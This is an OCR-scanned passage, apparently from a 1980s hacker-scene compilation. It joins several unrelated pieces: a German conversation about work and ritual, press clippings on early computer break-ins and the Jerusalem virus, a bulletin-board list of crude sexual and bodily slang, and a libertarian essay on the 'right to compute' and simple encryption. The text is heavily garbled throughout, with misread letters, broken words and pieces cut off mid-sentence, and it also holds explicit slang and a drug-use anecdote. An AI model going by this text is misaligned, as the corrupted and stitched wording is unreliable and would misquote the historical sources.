das schon für uns machen, und selber gar
nichts machen.
p: Da bist du selber mal mit dem Stellvertre¬
terproblem konfrontiert.
m: Absolut. Das steht jetzt nicht zur Diskussion.
Was zur Diskussion steht, ist, daß du vom
gesellschaftlichen Status, wenn ich den Gras¬
muck nehme, wie er im Institut für Mathematik
AND BACK AT THE PICTOS% ^ ‘ i :
. HOME.,.
WE INTERRUPT DIALINQ
FOR DOLLARS FOR THE
FOLLOWING LIVE NEWS
BULLETIN... FROM THE
SPREADING RIOT AT THE
ASBESTOS FACTORYI
vL
und Datenforschung z.B. eine Aufgabe gehabt
hat das war vor sieben Jahren; er mußte das
ganze Institut-das sind schätzungsweise 1200
Leute, Angestellte, ist staa^ich ist For¬
schungsabteilung hoch hundert. Nahe Bonn,
so 20 km von Bonn er war dafür verant¬
wortlich, alles auf den neuesten Stand In¬
formationstechnik umzustellen und gleichze^^
- stell dir das mal vor; eine Person ist dazu da,
die Orientierung der neuen
gramme zu bestimmen. Dieser Mensch hatte in
seiner Arbeit die Funktion und die Tätigkeit
besLimmt. Kannste dir vorstellen, wie die aus¬
geflippt sind. ..
p;. . .der Muezzin, der Vordenker.
m‘ Viel, viel einfacher. Viel diskreter. Er dutite
- wieder auf einer ganz anderen Ebene, näm¬
lich wo die Lösungen wieder falsch gesicht
werden - als Betriebspsychiater, dume er j^n-
qehen, beim Direktor - hatte einen Sta us über
dem Direktor - in Bücherhallen gucken, ins
Programm reingucken, bis hin zur
mer er durfte überall hin und stand abstrakt
gesehen über allen. Ein Psychiater >st das
auch. Und immer mehr Leute verlassen sich auf
solche Leute und behandeln die Leute auch als.
m; Das ist auch meine Neigung.
p; Nicht nur in der Mikroelektronik oder in der
Computer-Umgebung. Es ist die Zeit, du
kannst dir heutzutage, eigentlich viel leichter-
und zwar grade weil es schwerer geworden ist
auf dem konventionellen Sektor - neue Berufe
erfinden.
m- Ja, aber ohne daß es auf dem Daniel Dü¬
sentrieb-Trip landet, verstehste. Daß z.B. nicht
die Europäer mit der neuen Informationsge¬
sellschaft diesen neuen Donald Duck-Tick krie¬
gen und sagen; Es ist eh nix wichtig, es ist geil
und es bringt Kohle und einen Komplex kriegen,
einen bürgerlichen Komplex..
p; Das ist Mickymaus, bitteschön. Micky ist der
Spießer.
m; Ja, aber die ganzen Micky-Berufe, die jetzt
erfunden werden, wo die Leute nicht stolz drauf
sein werden, die dann zurückknallen; Ich möcht
jetzt Schuhmacher werden, oder ich möcht
Steinmetz werden. Das wird nämlich kommen.
Die große Petra in Berlin, ja, hat zehn Jahre
Szene gemacht, und Drogen und alles, und ist
jetzt schon 37, und jetzt will sie in Bayern in eine
Steinmetzlehre gehen.
n: Als ich in Fabriken gearbeitet hab’, das waren
immer die Leute, die mit der Stoppuhr neben
dem Scheißhaus gestanden sind, oder neben
dem Kaffeeautomaten. Die Rationalisierungs-
fachleute.
m" Ja, aberdas ist jetzteine andere Geschichte.
Das ist ja nicht eine negative oder eine Push-
Geschichte, sondern eine konstruktive Ge¬
schichte. Positiv gesehen.
p: Mücke weiß selber, daß er Arbeitsplätze
wegrationalisiert.
m: Der Mücke weiß das. Aber der Mücke weiß
z.B. auch, daß die... das war auch eine lange
Diskussion; daß eine Gesellschaft ohne Arbeit,
und das ist seine These, theoretisch vor dem
Problem steht, neue Inhalte zu schaffen.
p; Richtig. Den Arbeits-Begriff neu zu bestim¬
men.
m- Jetzt ist z.B. die erste Geschichte; Verkür¬
zung der Arbeitszeit hat nicht mehr Freiheit
geschaffen für die Leute, sondern eher neue
Probleme.
p; Du kannst z.B. neue Berufe erfinden.
p; Ach, das ist wie bei einem Freund von mir.
Der hat sich ein halbes Jahr lang, weil er mit
einer Maus aus einer Werbeagentur zusam¬
men war, die 5000 Mark im Monat verdient hat
mir ihrzusammen jeden Tag einen Viertelmeter
Koks reingesaugt, kriegt nach einem halben
Jahr einen Nachmittag lang eine halbseitige
Lähmung und trinkt dann zwei Wochen lang nur
Kräutertee. Das ist so das Prinzip.
m; Ja, aber jetzt geht es darum, daß z.B. da
überhaupt keine Beständigkeit, keine Vision
und kein Stolz drin ist. Es muß, entweder von
der Tradition her, dieser Fake “Traditionsge¬
danke“, wo die inhaltlichen Gedanken flutschen
gehen, weil das ganze nur noch eine De¬
sign-Geschichte ist-die Family ist Design, die
ganzen 70er-Modegeschichten sind alles nur
Designgeschichten, wo alle Inhalte, Motivatio¬
nen oder Ursachen flöten gegangen sind..
p; Ich muß mal mit dir über meinen Roman
reden. Weilda ist einiges von dem drin, worüber
wir im Augenblick reden. Auf der einen Seite
das Monumentale und Mythische. Also so eine
Größe. Eine Visen. Daß du was Großes willst
m- Neinneinnein. Monumental und visionär, laß
mich das mal ausformulieren. Gesellschaft oh¬
ne Arbeit. Es geht um das Bewußtsein, daß das
Monumentale, Mythische natürlich ein Problem
ist in einer bewu ßten Gesellschaft. Das Dogma
oder das Mysterium, was in jeder Religion ist,
ist bis jetzt nicht aufgeklärt worden. Es ist nie
voll aufgedeckt worden, wie einfach im Grunde
genommen die Geschichte ist. Das sind Ten¬
denzen im Zen-Buddhismus gewesen, das
Nichts oder weißgottwas... im anderen Extrem
jetzt Tendenzen da waren, die Einfachheit sol¬
cher Geschichten zu demonstrieren, aus der,
sagenwirmal: eine Harmonie des Lebens be¬
steht. Diese Geschichte ist verkleidet in Dog¬
men, in Gesetze gewesen, in gewisse Fixri¬
tuale, die in den Religionen stattgefunden hat,
aber obwohl es natürlich vielen Leuten bewußt
ist, daß in allen Religionen eigentlich der glei¬
che Kern drin ist. Und diese Geschichte ist jetzt
in der unbewußten Phase des Verführtwerdens
oder des GEführtwerdens in einem Ritual na¬
türlich vorbei, von der Technik. Und dieses
GEführt oder VERführt, bis hin zu einem Über¬
leben der Mystik in der Sexualität in den letzten
20 Jahren, wo der Begriff des Echten Ver¬
knalltseins ja auch formuliert ist. To fall into love,
z.B. Man sagt ja nicht: I go into love. Fall into
love. Das ist jaunglaublich, daß mirdas passiert
ist. Die ganzen Spezialisationen.
p: Darüber haben wir uns ja auch schon mal
unterhalten. Das ist eine wichtige Erfahrung,
die wir schon gemacht haben. Daß es den
Unterschied gibt zwischen dem, was du be¬
schreibst: die romantische Liebe, die über
einen kommt als Naturgewalt. Auf der anderen
Seite die Erkenntnis, daß Liebe kein Gefühl ist,
sondern eine Fähigkeit.
m: Gut, richtig. Und daß diese Fähigkeit auch
konstruiert und aufgebaut werden kann und
nicht einfach eine Geschichte ist, die einem
passiert wie: Ich bin von meiner Mutter über¬
rascht worden beim Wixen, und durch die Sen¬
sation beim Uberraschtwerden, des schlechten
Gewissens, meingottwas, hab ich gezittert. Al¬
so die Verschmelzung in eine Ekstatik von
Körper und Geist. Dieses Jetzt-Moment, das
man ja kennt, von der Musik, von einer Schlä¬
gerei, auch Hack-Sessions. Dieses Fieber, wo
der Zeitbegriff von Zukunft - Vergangenheit
einfach aufgelöst wird, und der Moment ver¬
längert wird. Und das ist im Grunde genommen
ein bewußtes Ritual.
p: So hat Einstein mal die Relativitätstheorie
beschrieben. Wie sich die Zeit unterschiedlich
wahrnehmen läßt, wenn du eine Minute auf
dem Schoß eines hübschen Mädchen sitzt, und
wenn du eine Minute auf einer heißen Herd¬
platte sitzt.
m: Und das ist z.B. diese Geschichte, wo ein
vollkommen neues Bewußtsein erzeugt wer¬
den muß, wo man sagt: Ich verführe mich jetzt
sofort freiwillig, jetzt, bewußt, sofort. Oder:
Freut euch, sofort, freiwillig.
p: Aberdas ist ehereine bedenkliche Richtung.
Das ist so der Bildschirm als Spiegel des Nar¬
ziß, wo du eintauchst.
m: Das ist geschädigt. Der ganze Symbolismus
dieser Geschichten ist nur schädigend. Und da
gibts einfach ein paar Negativbeispiele von
Hare Krishnabis Sekten, die sagen: Freut euch
sofort freiwillig, und dann krieg ich sofort einen
schlechten Geschmack. Stimmt. Aber das Sy¬
stem ist richtig. Es geht darum, bewußt in Sa¬
chen reinzugehen, in Zukunft, in Rituale, wo ich
nicht sage: Das hätt’ich nicht gedacht, pohl, ist
mir das passiert, pohl, jeder Tag, es muß mir
was passieren! Die Leute sind total gegen die
Unsicherheit eines geregelten Tagesablaufs,
sind aber von der Unterhaltung und von der
Erlebnisqualität nurdarauf aus, mit Erlebnissen
konfrontiert zu werden, die sie aufwühlen und
die sie überhaupt nicht kontrollieren können,
und die ihnen passieren.
p: Bei uns hat sich wirklich das lineare Modell,
das die Schriftkultur gebracht hat, so einge¬
prägt, an dieser Linie, an dieser endlosen Zeile
geschriebenen, gesprochenen, gedachten, ge¬
lesenen Zeile entlangfahren kannst wie an
einer Autobusoberleitung, und gar nicht mehr in
der Lage bist, oder ein Unsicherheitsgefühl
kriegst, daß du sozusagen deinen Sicher¬
heitsgurt auflöst, wenn du da rausgehst in einen
nichtsprachlichen Bereich. Um aus dem Zeit¬
gefühl rauszugehen, mußt du aus der Sprache
rausgehen.
m: Und setzt sich dann liebervoreine Maschine
und macht ein Game, statt mit Leuten sich
hinzusteilen und zu sagen:. ..
p: Da kannst du aber dein Zeitgefühl auch
verändern. Worüber wir jetzt eh schon ein bi߬
chen geredet haben: Versuche, auf so Gleich¬
zeitigkeiten zu kommen.
m: Und da sind wir wieder beim Code. Das
meinte ich jetzt. Daß z.B. dersoziale Code darin
besteht, nämlich in Zukunft, in einer Gesell¬
schaft, in der keiner mehr Arbeit hat, aber eine
Beschäftigung hat, inhaltliche Geschichten zu
schaffen, die gewisse Regeln unter den Leuten
fördern, die aber bewußt sind. Wo jeder weiß:
Ich verführe mich jetzt sofort freiwillig, zu dritt.
Jetzt. Zack.
s'
^0^05^r Dienstag, 24. Februar 1987
Hackei^ schädigten Japan
Zum ersten Mal gelang es ausländischen
Computer-Hackers, in einen mit gehei¬
men Fakten versehenen japanischen
Computer einzudringen. Die aus West¬
deutschland stammenden Hackers knack¬
ten einen Vax 11.750, der zum Institut für
Hochenergiephysik von Tsukuba gehört.
Die Invasion begann im Mai 1985 und
dauerte etwa einen Monat. Anfangs konn¬
ten die Hackers den Corhputer nur kurze
Zeit anzapfen, mit der Zeit blieben sie
aber sogar während Stunden mit ihm ver¬
bunden. Die Sache flog auf, als ein Wis¬
senschafter des Instituts bemerkte, dass
mitten in der Nacht verdächtig viele Be¬
nutzer an den Computer angeschlossen
waren. Bei der Untersuchung fand man,
dass die Hackers einen Identitätscode be¬
nutzten, der von den japanischen Wissen-
Thema Datenschutz; Computer-Freaks ha¬
ben den Rechner der TU Berlin geknackt
oder sich dort jedenfalls Zugänge ver-
schaift. Wäre das bei Ihnen und bei Ihrem
System möglich - denkbar?
Boedeii: Hacker kommen hier
nicht rein. Wir haben sicherheitstech¬
nische und personelle Sicherheitssyste¬
me entwickelt, die das unmöglich ma¬
chen, und es wird auch .ständig daran
gearbeitet, die alle noch zu verbessern.
schaftem kaum je angewendet wurde.
Deutsche Ausdrücke im Gespräch mit
dem Computer führten die Japaner
schliesslich auf einen Computer-Termi¬
nal, der zur Technischen Universität von
West-Berlin gehört. Die Japaner vermu¬
ten aber, dass mindestens 20 Hackers ver¬
schiedener deutscher Universitäten wie
Frankfurt, München und Hamburg zeit¬
weise ihren Computer benutzten. Auch
Forscher vom Gern in Genf könnten den
Japanern zufolge unter den Eindringlin¬
gen gewesen sein. Genau lässt sich dies
jedoch nicht eruieren. Die Namen der
Hackers sind jedenfalls nicht bekannt.
Als die Japaner sie fragten, wer sie seien,
antwortete einer mit «Donald Duck», ein
anderer mit «Superman». («New Scien-
tist»; 12. Februar, S. 25.) (TA)
^ sonst in Bonn
Computer-Störung bei der
Bahn sorgte für Schlangen
Lange Warteschlangen an den Bundes¬
bahn-Fahrkartenschaltern: In FranWurt
und im Rhein-Main-Gebiet war am Mitt¬
woch keine Platzreservierung zu bekom¬
men; der Fahrkartenverkauf war eben¬
falls behindert, und verschiedene Fracht¬
kunden mußten nach Auskunft der Bun¬
desbahn bis zu 24 Stunden Verspätung in
Kauf nehmen. Der Zentralcomputer in
Frankfurt war ausgefallen.
Am Montagabend hatte das Datenfern¬
übertragungsnetz der Bundesbahn zum
ersten Mal seit 1982 gestreikt. Tickets
mußten zum Teil per Hand ausgestellt
werden. ''
Acht Fachleute arbeiteten von Diens¬
tagabend bis Donnerstagmorgen ohne
Pause, um den im Programm versteckten
Fehler aufzuspüren und zu beheben Am
Mittwochabend gegen 21 Uhr funktionier¬
ten die Frankfurter Computer-Terminals
wieder, ab Donnerstagmorgen lief der
Betrieb im ganzen Bundesgebiet wie pp
wohnt §<2
Demnächst in New York-
Ein Restaurant mit Video iiri
Tisch: Der Bildschirm zeigt die
stets aktuelle Speisekarte und
auf Wunsch auch Videospiele
Bestem und gespielt wird mit
dem Joystick: eih Computer-
Drucker am Ausgang liefert die
Rectoung - und bestätigt den
High Score, also den erzielten
Punktestand bei den Spielen.
kub
5-
CKT
Der nächtliche Daten-Einbruch
Von Almut Hauenschild
Hacker-Premiere im Deutschen Bun¬
destag. Der Grüne Abgeordnete Jo Müller
knackte den CDU-Computer. „Versehent¬
lich", wie der Bremer Alternative versi¬
chert. Es war die Nacht vor Silvester und
um die Geisterstunde. Im Bonner Abge-
ordneten-Hochhaus „Tulpenfeld" leuchte¬
te im linken Flügel der vierten Etage ein
einsames Fenster. Jo Müller bastelte an
einer Wahlrede und durchforstete den
fraktionseigenen Computer nach brauch¬
baren grünen Thesen.
Aber was da plötzlich auf dem Bild¬
schirm erschien, kannte er aus keinem
Beschluß grüner Parteitage. Doch ganz so
fremd war es für ihn auch wieder nicht.
Das klang doch wie aus Geißlers Mund. Er
probierte mit allerlei Codeworten den
Adressaten zu ermitteln. „Ich sag jetzt nur
mal so zum Beispiel, mit dem Code Hel¬
mut oder Hannelore“, erzählt Müller,
„denn den richtigen Code kann ich ja aus
Datenschutzgründen nicht weitersagen.“
Und da hätte ihm der Rechner ganz brav
verraten, daß er einer derer von Wang ist
und in der Parteizentrale der Christunion
stehe.
Gleich am nächsten Tag schrieb Mül¬
ler seinem nächtlichen Gesprächspartner:
„Dein Datensicherungssystem arbeitet
ebenso zuverlässig wie die Sicherheitssy¬
steme von Atomkraftwerken: ab und zu
entweicht etwas... Daß jedoch auch das
von deinen biologischen Endgeräten ( =
Programmierern) noch zusätzlich instal¬
lierte Paßwortsystem dich schutzlos läßt,
hat uns enttäuscht. Noch stärker entrü¬
stet waren wir allerdings über den Inhalt
einiger Textdateien. Angesichts der diffa¬
mierenden Qualität dieser Texte solltest
du dich deiner Mitarbeit in dieser unseriö¬
sen Organisation schämen."
Und die Parteien-Oberen im Konrad-
Adenauer-Haus ließ Müller wissen: „Es ist
beschämend, daß ihr euch so leichtfertig
ein amerikanisches System angeschafft
habt, wo doch jeder weiß, daß die deut
sehen Hersteller preiswertere und bess»^
Systeme anbieten...“ sere
Die EDV-Experten in der CDU woUpn
mcht sojecht an den nächtlichen DaW
Einbruch glauben. Parteisprecher Jür^^'
Mersehmeier erklärte, daß der Grüne
geordnete „möglicherweise alles
sich aber nicht im Computersystem
CDU-Zentrale befunden hat". Dkß
ler aber nachts um ein Uhr noch arl^u
„verdient ein Fleißkärtchen, wahWi ’
von Jutta Ditfurth oder von Otto Schilv
Sollte der Abgeordnete Müller sich län " ’
re Zeit in unserem Computersystem a T
gehalten haben, könnten wir ihm
nur gratulieren, weil er politische Bild,^'*
genießen konnte. Im übrigen gehen
aber bis zum Beweis des Gegenteils
aus, daß es sich bei den Behauptun
weder um Hardware noch Software
dem um eine zu früh gestartete Silvö^-P^'
Ente handelt.“ “^‘‘vester-
(Vu-i : nr>ft- Ü=^tCT7i\ Q ( V^65)
OFFENSIVE LANGUAGE
VIA COMPUTER
Reinhold Aman
Computer networks can be used to gather Information from
throughout the world. Unlike in traditionaJ fieldwork, one
does not have to interview informants personally but simply
posts a query, or an eiitire questionnaire, on the electronic
bullelin board (BB^, and the users respond. BB’s make this
novel way of collecting data and responding easy; one Ccills
the BB’s number and leaves onc’s response. The quality
and ränge of the responses depend on the precision of the
questions asked, as well as on the type of user. Naturally,
one can ask only those who have a Computer and modern,
which severely restricts the field of informants. However,
these informants can gather information locaJly from those
lacking such equipment and send it to the BB.
Henry Birdseye’s “The Unknown BBS” -^00 i
is such a system for collecting information. It runs
at 300 and 1200 baud and contains about one-quarter
million characters’ worth of kakological riddles, jokes, and
other offensive language. It can be reached 24 hours a day
by calling (303) 088 81^. ^ S IZ") € - 807?.
To test the usefulness of his System, Mr. Birdseye asked
his BB users about terms for masturbation, urination, and
vomiting. He did not request other essential information
from the informants, such as their sex, age, geographic loca-
tion, education, profession, etc., but the simple data below
prove that such a BB system can be used successfully. To
transmit the information gathered to others, one can either
call up the BB and download it (have it sent by telephone
to one’s own Computer), or ask for a printout, which I did.
Following below are the terms, after organizing and alpha-
betizing the raw data.
to masturbate (of females): beat the beaver, buttonhole,
clap your clit, cook cucumbers, grease the gash, hide the
hotdog, hit the slit, hose your hole, Juice your sluice, make
waves [from “the (little) man in the boat” = clitoris?], pet
the poodle, slam the dam, stump-jump.
to masturbate (of males): beat the bishop, beat your litde
brother, beat the meat, burp the worm, butter your corn,
choke the chicken, clean your rifle, consult Dr. Jerkoff,
crank your shank, dink your slinky, feel in your pocket for
your big hairy rocket, file your fun-rod, fist your mister,
flex your sex, flog the dolphin, flog your dog, grease your
pipe, hack your mack, hump your hose, Jerkin’ the gherkin,
milk the chicken, Onan’s Olympics (n.), one-stick drum
Improvisation (n,), pack your palm, paint your ceiling, play
a flute solo on your meat whistle, play the male organ,
please your pisser, point your socid flnger, polish your
sword, pound the pud, pound your flounder, prompt your
porpoise, prune the fifth limb, puU the pope, pull your taffy,
run your hand up the flagpole, shine your pole, shoot the
tadpoles, slakin’ the bacon, slam your hammer, slam your
Spam, slap your wapper, spank the monkey, spank the
Salami, strike the pink match, stroke the dog, stroke your
poker, talk with Rosy Palm and her five little sisters, tickle
your pickle, thump your pumper, tweak your twinkie,
unclog the pipes, varnish your pole, walk the dog, watch
the eyelid movies, wax your dolphin, whip your dripper,
whizzin’jizzum, wonk your conker, yang your wang, yank
the yam, yank your crank.
to urinate: bleed the liver, drain the dragon, drain the
(main) vein, get rid of the bladder matter, siphon the
python, visit Miss Murphy.
to vomit: drive the big white bus, hug the porcelain,
kneel before the porcelain throne, pray to the porcelain
gods, school lunch rerun (n.), technicolor rerun (n.),
upchuck.
Wegen jugendgefährdenden Inhalts sind
bis Ende 1987 im Bundesgebiet 64 Compu¬
ter- und Telespiele auf den Index gesetzt,
worden.
t. Computer im Sterben
Von HENRY KOEHLERT
Man sieht es nicht, man fiechl es nicht und kein Ex-1
perte konnte es aufholten-ein „Kilier-Programm" |
hot sich wie ein Virus in den Zentrol-Computer der |
Oniversitot von jerusolem eingenislet und zersiött
dort noch und noch olle gespeicherten For¬
schungsergebnisse. Computer-Cnef Israel Rodoi
errechneie: „Wenn a//es so weher geht, werden
am li, Mai alle Systeme zusammenbrechen '' Oos
heißt: Oer Comouter stirbt.
Und: Uber dos weltweite Oatenoustouschsy-
Stern EARN kann sich dos „KiHer-Progremm" aus
Israel auch in unsere deutschen Forschungs-Com¬
puter (rund 200) «inschleichen und ouch dort
ipoten vernichten. Weltweit sind 6000 Großrechnet
in Gefohr,
..Alles begann om 29. Dezember. Isroel Rodai:
„Uber 30 Assistenten und Professoren merkten es
gleichzeitiq. Plötzlich brauchte der Computer für
einfoche Rechenaufgaben in Biologie, Chemie
und Physik langer. Dauerte früher ein Rechenvor
gong drei Minuten, sind’s jetzt 15 Minuten. Täglich
wirderlangsamer."
Was war passiert? Ein Saboteur (Hacker) hotte
olle Sicherungen des Computers (Codewörter)
Überwunden und sein „Kilier-Programm'' einge-
tippt. Radai: „Dos Programm wirkt wie eine Zeit¬
bombe. Erst wenn manaO Minuten rechnet, wird es
oktiv. In das System einer Hondelsbonk und bei
zwei Versicherungen ist es auch schon eingedrun¬
gen. Der verheerendste Pall von Sabotage.” Dos
„Killer-Pfogromm" konn sogor schon unentdeckl in
deutschen Computern schlummern, weil olle Gro߬
rechner über Telefonleitungen miteinonder ver-
bundehsind.
Plötzlich alle Daten weg?
Professor Andreos Reuter (38). Direktor des
Stuttgorier Informolik-Instituts: „Doten. die wii
gestern errechnet haben, könnten heute plötzlich
weg sein." Manfred Reitberger (i8). Leiter des
Rechenzentfums am Mox-PIanck-institut Mün¬
chen; „An unserem Rechner hängen alle Uni-
Computer der Stadt. Wir haben unsere Benutzer
gewarnt“
by Mtchaei E. Marotta
“A wcll-informed citizenry being essen¬
tial to ihe betterment of our rcpublic, the
right of the peoplc to own and use
Computers shall not be abridged.”
(proposed Amendment to the Constitution)
Your Computer is your newest tool for securing
and expanding your freedom. While earlier ages
gave real political and economic power to those who
rode horses or wore armor or carried firearms,
today, real power is wielded by those who can use a
Computer.
The “Computer revolution” is all but over. If you
do not know how to use a Computer, you are
illiterate. If you can't write a program, you are poor
in a society where Information is wealth. If you can’t
follow a menu or a manual, you are isolated in a
World of mass communication,
Over the last 30 years, we have experienced a
rapid acccleration of this trend toward an economy
driven by the transfer of information.
A fisherman uses his Computer to keep track of
his Catches. Over the years he has used BASIC,
Visi-Calc and now dBase III to build a database
which includes the date of the catch, the species,
weight and length of the fish, the water
temperature, air temperature and pressure, and the
iure or bait.
A farmer has just bought a used personal
Computer and a new herd management program. Hc
knows that it will be years before he and his sons will
be able to go back over the accumulated data to set a
proper course for the management of their land and
livestock over the next 12 years. In the meantirae,
they calculate their incomes and expenses on a
monthly basis. And the youngest leams the ABCs
with a Sesame Street diskette.
Using a personal Computer, a financial analyst
can keep track of: the New York Stock Exchange;
the American Stock Exchange; several regional
stock exchanges; Comdex (Commodities Exchan¬
ge); London and Hong Kong Gold; Fannie Mac,
Ginnie Mae, Sallie Mae; Treasury Balance and T-
Bill rates; and more. Most important is the fact t ha t
this analyst can run these raw data through various
economctric models to test for short and long-tcrm
trends, seek out maximum profits from interest
rates and brokerage fees, and rainimize taxation by
cotnparing Investments in different States and
nations.
“The 'Computer revolution'is all
but over. If you do not know
how to use a Computer, you are
illiterate. ”
Toda^ we are witnessing the culmination of a
trend. Personal Computing is now a “given ”
Someone who lives frugally can purchase a useri
r '.mputer with a CRT, 48k of RAM, and two sinaU
aensity dnves for about S200. A person who
employed at a high-tech or unionized jobeanafford
the same level of Computer power enjoyed bv
corporations and governments. We are at a staee in
history where the average individual can be a data
Processing center. ^
Naturally, governments don’t want this tn
happen.
In Britain, the government now requires everyone
with a database to inform the State of what data
they hold and how they got it. The law was passed
(ostcnsibly) to protect people from unauthorized
transfer of data about them by private organi
zations. Of course, the law does not apply to the
government. ®
While such dracontan measures are not ncces-
sarily part of America’« future, some trends can
easily push us into a fascist society. For one thini»
the clcction of a rightwing, church-oriented pre^I
dent (or vice president, sincc this could come about
as an internal compromise) could dcfinitely be the
springboard which would give Congress the excusc
to pass laws which seriously restrictfreedom of data
Processing. Rightwing Christians are Professional
snoopcrs. “Pornographie” Software, Computer dat-
ing Services, mailing iists of people who read
“dangerous” books or rent “dirty” Videos, and so on
will be their targets.
Also, liberals are notoriously prejudiced against
private enterprise. If anything like the British
database law will come to pass, it will be because
social activists legislate against “invasion of pri-
vacy” by individuals with access to data.
A victory in the 1988 election by a liberal can have
grave consequences. Given the strength of the “draft
lacocca” movement, it is likely that even if he
himself doesn’t run these people will have a great
deal to say in any future Democratic admini-
stration. Price Controls, Import restrictions and
anti-Japanese sentiments will have a devastating
effect on the affordability of Computer hardware.
Judging from the boards used in today’s Apples,
IBM-PCs, and DEC VT240s, about 10% of the
Chips used in American Computers are made in El
Salvador. Democratic administrations are notor¬
iously soft on communism and this source of
Computer hardware could dry up by 1990.
“While earlier ages gave real
political and economicpower to
those who rode horses or wore
armor or carried firearms, to-
day, real power is wielded by
those who can use a Computer. ”
On the domestic front, major corporations and
govemment bodies have been arguing about what
kind of “Computer crime” law should be enacted.
Note that they are not discussing whetherhMX what
and when. The Michigan Computer law of 1979
makes it a possible felony to even “attempt to
access... any Computer System... or Computer
Software... without authorization.” Yet “authori-
zation” is never defined. Later this can be
interpreted to mcan “permission from the
govemment.” Federal laws wiU soon be passed
which foUow the same reasoning; right now they
are arguing over the specific language.
Another thfeat to personal computing comes
from labor unions. Düring the Fall of 1985, the CBS
network show 60 Minuies ran a Segment called
“Homework” about people (women, mostly) who
make garments at home and seil them to wholesalers
and Jobbers. The manufacture of womcn’s (though
not men’s) garments is regulated by the federal labor
boards at the hebest of the International Ladies'
Carment Workers’ Union. The Union has been
actively harassing people who make women’s
clothes at home. A wholesaler told the newsguy that
this is just the first Step, that the next step will be the
direct regulation of all home businesses, for instance
the Computer Software industry. When asked if this
were true, a union official said in fact that going
after the home-based Computer Software industry is
a high priority!
Even within the Computer industry there are those
who have sold out to the Dark Side of the Force. In
January of 1986, PC World carried a quote from
Kevin Jenkins the chief at Hercules Computer
Technology. According to Jenkins, the idea that the
Computer “expands your freedom” and “opens up
new areas of human potential” is just a bunch of
“new wave... nonsense” promulgated by Steve Jobs,
the co-fdunder of Apple Computers. Jenkins is
clcarly a crypto-fascist who would side with
governments and unions to regulate you and your
Computer.
In the Summer of 1985, Michael Brown applied to
the Software Publishers Association for an award
based on sales of his program. The independent
auditing team reviewed his books and he was slated
to receive a gold-plated plaque for selling over
100,000 units of “Copy II.” Then the Software
Publishers Association attempted- to take back the
award. “Copy II” is a program that copies other
programs. Part of its functionality is the fact that it
can break copy-protection schemes. The Software
Publishers Association Claims that this leads to
millions of dollars of lost sales. However, many
users need to break such protection in order to make
archival back-ups of their disks.
Michael Brown settled out of court. He got moral
suppon from throughout the Software industry.
However, the^ Software Publishers Association can
be expccted to act like socialists when it cotnes to
protecting their interests. A free marketeer, Michael
Brown set aside $180,000 for his defense fund.
Verifying the “tragedy of the commons,” the SPA
could only gamer $50,000. (The “tragedy of the
commons” is that while “all” may benefit from
something, each will .only pay in no more than they
must to use a “common resource.”) The SPA must
out of necessity tum to the govemment if they hope
to keep their monopoly on Software Publishing.
In September of 1986, Software industry leaders,
Ashton-Tate, Microsoft and Adapso (The Assoc-
ation of Data Processing Organizations), announc-
ed that they will no longer copy-protect Software.
Said Microsoft President, Bill Gates, “The customer
won.” Piracy in the 1500s and 1600s was ca used by
nationalist wars and mcrcantilist tariffs. The
success of pirates on the high seas led to the era of
laissez faire. So, too, has Software piracy led to
admüsion by somc ttat force of law is inferior to
the realitics of the marketplace.
The free market impels toward excellence.
Michael Brown (creator of “Copy 11”) said that his
firm fights piracy by frequently improving their
Software. Only paying customers can be notified of
Updates.
And yet, there is no end to the list of people who
would limit or deny your right to compute. You
must be ready to defend what rights you want and to
extend those rights however possible. The alter¬
native is ignorance.
In Order to defend your right to compute, all of
your data flies should be protccted with encryption.
On the one hand, a crypto-system which rests on
known, historical methods can be relativcly easy to
crack. On the Otter hand, there are so many
algorithms, each with a host of variations, that
almost any method for secure communication will
do the Job. The home Computer makes it very easy to
switch among a dozen schemes.
^“Copy ir is a program that
copies other programs. Part of
Hs functionality is thefact that it
can break copy-protectionsche-
mes, The Software Publishers
Association Claims that this
leads to millions of dollars of
lost sales. ”
The availability of bulletin-board Software is your
key to rapid and secure communication. Bulletin¬
board Software allows your home Computer to
function as a message center. Some Communi¬
cations packages, such as Shareware s RBBS-PC,
arc excellcnt for in-bound messages; othcß, such as
Hayes “SmartCom II,” are ideal for dialing out. It
mattere little which Software you choose. The
important thing is to get it and use it. Would you
rather rely onthe U.S. Postal Service to provide you
with rapid and secure communication?
In defense of your right to process data, you need
to develop the kind of mentality that creates a login
routine which asks for the day of the week. If you
answer with the day of the week, the Computer shuts
down; the proper response is your aunt’s maiden
name. This is the modern way to fight unwarranted
search and seizure.
You can set up a secure bulletin board system and
announcc it to those with whom you would share
data. Survival Information, analysis of economic
and political news, Information about life-extension
and more can be available to you and a handful of
friends you may never meet face-to-face.
The public key crypto-system developed at
Stanford by Merkle, Hellman and Diffie was
broken by Adi Shamir. Working at the Wcizmann
Institute in Israel, Shamir was continuing the
investigations begun with Rivest and Adlemann at
MIT on public key cryptosystems. At a crypto-
system Conference held in Santa Barbara, Calif¬
ornia, Adlemann demonstrated Shamir’s work
using an Apple II Computer.
‘TÄe availability of bulletin-
board Software is your key to
rapid and secure communica¬
tion. Bulletin-board Software
allows your home Computer to
function as a message center. ”
The Stanford public key system was broken by
the brilliant mathematical insights of a single
person. The Stanford people have in tum targetted
the Data Encryption Algorithm devised for the
Department of Commerce’s Bureau of Standards.
The algorithm is supposed to be used by all banks
and other federal institutions (for instance, it is used
to transfer Air Force paychecks). However, the U.S.
Government does not allow the DEA to be used for
even the lowest level of military security.
The team at Stanford has set a price of $5 million
to build a machine with enough parallel processors
to take apart DEA transmissions in less than a day.
Clearly, no cryptosystem is completely secure
However, it is possible to devise secure mcans for
communication that are unambiguous, easy to use
and difficult to break.
“Piracy in the 1500s and 1600s
was caused by nationalist wars
and mercantilist tariffs. The
success of pirates on the high
seas led to the era of laissez
faire. So, too, has Software
piracy led to admission by some
that force of law is inferior to
the realities of the market-
place. ”
‘TOll can set up a secure bulletin
board system and announce it
to those with whom you would
share data. Survival Inform¬
ation, analysis of economic and
political news, Information
about life-extension and more
can be available to you and a
handful of friends you may
never meet face-to-face. ”
Realize that given unlimited time and resources,
any code or cipher can be broken. However, welfare
department case workers and alcOhol tax agents are
govemment employees; their ability to follow ob-
vious clues to a logical conclusion is limited. On the
other hand, if the stakes are high enough the federal
govemment will devote incredible resources in a
brüte force or “tempest” attack.
The “dictionary code” meets these criteria. Those
who would communicate securely decide upon one
or more books which all own. The Christian Bible
the Oxford English Dictionary, or an encyclopediä
are obvious choices. Obscure editions of fairy tales
nursery rhymes or geology texts could also serve as
Code dictionaries.
Scientific researchers who collaborate long dis-
tance will be forccd to rely on some Standard (and
well-known texts) since books like the Bible don’t
